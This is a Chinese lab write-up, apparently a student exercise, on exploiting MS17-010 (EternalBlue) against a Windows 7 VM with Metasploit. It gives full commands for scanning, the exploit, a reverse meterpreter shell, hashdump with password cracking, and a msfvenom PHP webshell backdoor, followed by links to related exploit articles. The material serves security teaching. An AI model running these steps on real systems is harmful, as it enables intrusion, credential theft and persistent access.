MS17-010漏洞利用

1.安装虚拟机win7 x64,实现利用ms17-010实现对其win7 x64主机开始渗透,查看该主机信息,打开远程桌面,抓取用户名和密码并破译,创建一个 : 学号.txt文件,实现上传,下载,删除。

首先启动win7 x64虚拟机,查看IP地址为192.168.70.139,如下如图所示:

在win7 x64上搭建wamp网站服务器从上到下依次安装软件,如下如所示:

安装成功后通过浏览器访问192.168.70.139查看是否能正常访问该网站,如下图所示:

Ms17-010漏洞的利用

接下来打开kali实现利用ms17-010漏洞,实现对其win7 x64主机进行渗透,首先使用scanner下扫描模块扫描目标主机是否存在ms17-010的漏洞,如下图所示:

在kali中输入以下命令:

命令:msfconsole

命令:search ms17-010

  1. >use auxiliary/scanner/smb/smb_ms17-010
  2. >set RHOSTS 192.168.70.139
  3. >run

确认目标机器的操作系统及存在漏洞之后便可以进行漏洞攻击了,输入命令use exploit/windows/smb/ms17_010_eternalblue,调用exploit下的ms17_010_eternalblue模块,并输入命令show payloads 查看可用的payload,如下图所示:

输入命令set payload windows/x64/meterpreter/reverse_tcp设置payload,并输入命令show options查看参数配置,如下图所示,需要配置的参数为RHOST和LHOST

输入命令set RHOST 192.168.70.139 配置目标机器的IP地址,输入命令set LHOST 192.168.70.134 配置kali本地的IP地址,配置完成后输入命令show options检查参数,如下图所示:

参数配置检查无误后,输入命令run开始攻击,并且返回一个meterptrter会话说明已经攻击成功了,如下图所示:

后渗透攻击:信息收集

进程迁移:例如攻击者利用浏览器漏洞攻陷了目标主机,但攻击渗透后的浏览器有可能被用户关闭,此shell是非常脆弱的,所以获取shell后的第一步就是移动这个shell,将它和目标主机中一个稳定的进程绑定在一起。

例如:输入ps命令获取目标主机正在运行的进程,如下图所示:

输入命令getpid查看meterperter shell的进程号为2280,如下图所示:

我们可用使用自动迁移进程命令,系统会自动寻找合适的进程然后进行迁移,输入自动迁移命令run post/windows/manage/migrate,执行命令后此时将原先的2280进程号修改为1244,如图所示:

收集系统信息:获取了稳定进程之后开始收集系统信息,输入命令sysinfo查看目标主机的系统信息,如下图所示:

捕获桌面输入命令screenshot抓取目标主机的屏幕截图路径为/root/bPgQxuoB,jpeg文件,如下图所示:

输入shell命令进入目标机器shell,如下图所示:

在shell输入exit可用停止shell会话并返回meterperter中,如下图所示:

上传文件命令upload,在kali虚拟机root目录下存在70zsz.txt文件,其内容为I‘m is 70 zsz!,输入命令upload /root/70zsz.txt c:\\,此文件上传到目标机器c:\目录下,如下图所示:

输入shell进入Windows shell查看从c:\目录下是否有刚刚我们上传的70zsz.txt文件,如下图所示:

下载文件命令download,输入命令download c:\70zsz.txt/root/download将目标机器c:\下的70zsz.txt下载到本机/root/download中,如下图所示:

输入命令rm c:\\70zsz.txt 将目标机器c:\下的70zsz.txt删除,如下图所示:

后渗透攻击:Hash攻击

使用Hashdump抓取密码,HashdumpMeterpreter脚本可用从目标机器中提取Hash值,破解Hash值可获得登录密码。计算机中的每个账号的用户名和密码都存储在sam中,当计算机运行时,该文件对所有账号进行锁定,想要访问就必须有“系统级“的账号。

在meterpreter shell提示符下输入hashdump命令,将导出sam数据库中Hash,如下图所示:

从图中我们可用看出,返回了三个用户账号,分别为Administrator,Guest,zsz,数据输出的格式为用户名:SID:LM哈希:NTLM哈希:::,在zsz账户中NTLM哈希进行破解,使用在线破解网站对其进行破解,如https://www.cmd5.com/,可以看到结果正是为zsz账户的密码:123456

后渗透攻击:后门

Meterpreter后门:在Meterpreter中,有一个名为PGP Meterpreter的payload,利用这个模块可创建具有Meterpreter功能的PHP WebShell,在攻击中使用Metasploit PHP Shell步骤如下:

1.使用msfvenom创建一个webshell.php

2.上传webshell.php到目标服务器

3.运行Metasploit multi-handler开始监听

4.访问webshell.php页面

5.获得反弹Metasploit shell

首先通过Metasploit的msfvenom攻击制作PHP Meterpreter,输入命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.134 -f raw > 070zsz.php,如下图所示:

因为目标主机使用了wampserver,因此得知需要上传070zsz.php文件至目标主机中c:\wamp64\www中,如下图所示:

输入exit返回meterpreter,使用上传命令upload/root/070zsz.php c:\\wamp64\\www中,如下图所示:

输入exit回到msf,输入如下命令设置监听,如下图所示:

  1. >exit
  2. >use exploit/multi/handler
  3. >set payload php/meterpreter/reverse_tcp
  4. >set LHOST 192.168.70.134
  5. >run

打开浏览器,访问目标机器服务器中070zsz.php文件,即访问http://192.168.70.139/070zsz.php ,结果可以看到服务端反弹shell成功如下图所示:

MS17-010漏洞利用的更多相关文章

  1. apt28组织新的flash漏洞利用包dealerschoice分析

    17号paloalto发布了文章dealerschoice-sofacys-flash-player-exploit-platform,文中提到apt28正在编写adobe flash player的 ...

  2. ms17-010漏洞利用教程

    ms17-010 漏洞利用并拿下服务器教程 攻击环境: 攻击机win2003 ip:192.168.150.129 Window2003 Python环境及工具 攻击机kali: ip:192.168 ...

  3. Linux环境下常见漏洞利用技术(培训ppt+实例+exp)

    记得以前在drops写过一篇文章叫 linux常见漏洞利用技术实践 ,现在还可以找得到(https://woo.49.gs/static/drops/binary-6521.html), 不过当时开始 ...

  4. Linux堆溢出漏洞利用之unlink

    Linux堆溢出漏洞利用之unlink 作者:走位@阿里聚安全 0 前言 之前我们深入了解了glibc malloc的运行机制(文章链接请看文末▼),下面就让我们开始真正的堆溢出漏洞利用学习吧.说实话 ...

  5. Struts2漏洞利用实例

    Struts2漏洞利用实例 如果存在struts2漏洞的站,administrator权限,但是无法加管理组,内网,shell访问500. 1.struts2 漏洞原理:struts2是一个框架,他在 ...

  6. LFI漏洞利用总结

    主要涉及到的函数 include(),require().include_once(),require_once() magic_quotes_gpc().allow_url_fopen().allo ...

  7. Drupal 7.31SQL注入getshell漏洞利用详解及EXP

    0x00 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp不再深入下去. 0x0 ...

  8. heartbleed漏洞利用

    1.  heartbleed漏洞扫描: 2.  heartbleed漏洞利用: poc.py      117.52.93.111 貌似没有打到管理员账号密码,可能是管理员没登录,其实,可以写一个自动 ...

  9. Kali Linux渗透基础知识整理(三):漏洞利用

    漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透.网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的.顾名思义,利用漏洞,达到攻击的目的. Metasploit Framework rdeskt ...

  10. CVE-2014-6271 Bash漏洞利用工具

    CVE-2014-6271 Bash漏洞利用工具 Exploit 1 (CVE-2014-6271) env x='() { :;}; echo vulnerable' bash -c "e ...

随机推荐

  1. 洛谷4475 巧克力王国(KD-Tree + 维护子树和)

    (嘤嘤嘤 又是一个自闭了一晚上的题) qwq果然不是平面上的点的问题,也可以直接用KDTree打暴力 我们对于巧克力直接建kdtree 维护一个\(mx[i],mn[i]\) 但是有一个非常不友好的事 ...

  2. CSS绘制三角的小技巧

    网页中常见一些三角形,使用css直接画出来就可以,不必做成图片或者字体图标当把一个盒子的高和宽的长度都设置为0,并且分别指定边框样式时,就会得到以下图形: 受此启发,可以知道三角是如何制作的(想要保留 ...

  3. HCNP Routing&Switching之BGP防环机制和路由聚合

    前文我们了解了BGP路由宣告相关话题,回顾请参考https://www.cnblogs.com/qiuhom-1874/p/15440860.html:今天我们来聊一聊BGP防环机制和路由聚合相关话题 ...

  4. [对对子队]会议记录4.15(Scrum Meeting 6)

    今天已完成的工作 何瑞 ​ 工作内容:制作了合成指南 ​ 相关issue:实现游戏内UI界面使用的组件 马嘉 ​ 工作内容:基本实现了箱子内物品列表 ​ 相关issue:实现游戏内UI界面使用的组件 ...

  5. 脚本:bat实现自动转换windows远程端口

    问题描述:通过一个脚本可以实现windows远程端口的转换,这个是拷贝过来学习的一个脚本 @echo off color f0 echo 修改远程桌面3389端口(支持Windows 2003 200 ...

  6. openmp学习心得(二)----常见的运行时库函数

    omp_set_dynamic();如果设置了动态调整,并行区域会根据系统的资源状况,动态分配线程的数量.好像仅仅有0和非0的区别,设置为0不进行动态分配. omp_get_num_threads,o ...

  7. 基础篇:JAVA集合,面试专用

    没啥好说的,在座的各位都是靓仔 List 数组 Vector 向量 Stack 栈 Map 映射字典 Set 集合 Queue 队列 Deque 双向队列 关注公众号,一起交流,微信搜一搜: 潜行前行 ...

  8. linux tr

    转载:tr命令_Linux tr 命令用法详解:将字符进行替换压缩和删除 (linuxde.net) tr命令 文件过滤分割与合并 tr命令可以对来自标准输入的字符进行替换.压缩和删除.它可以将一组字 ...

  9. inline hook原理和实现

    inline hook是通过修改函数执行指令来达到挂钩的.比如A要调用B,但人为地修改执行流程导致A调用了C,C在完成了自己的功能后,返回B再执行. 修改这段指令前首先要获取修改权限 由于要修改的代码 ...

  10. seq2seq之双向解码

    目录 背景介绍 双向解码 基本思路 数学描述 模型实现 训练方案 双向束搜索 代码参考 思考分析 文章小结 在文章<玩转Keras之seq2seq自动生成标题>中我们已经基本探讨过seq2 ...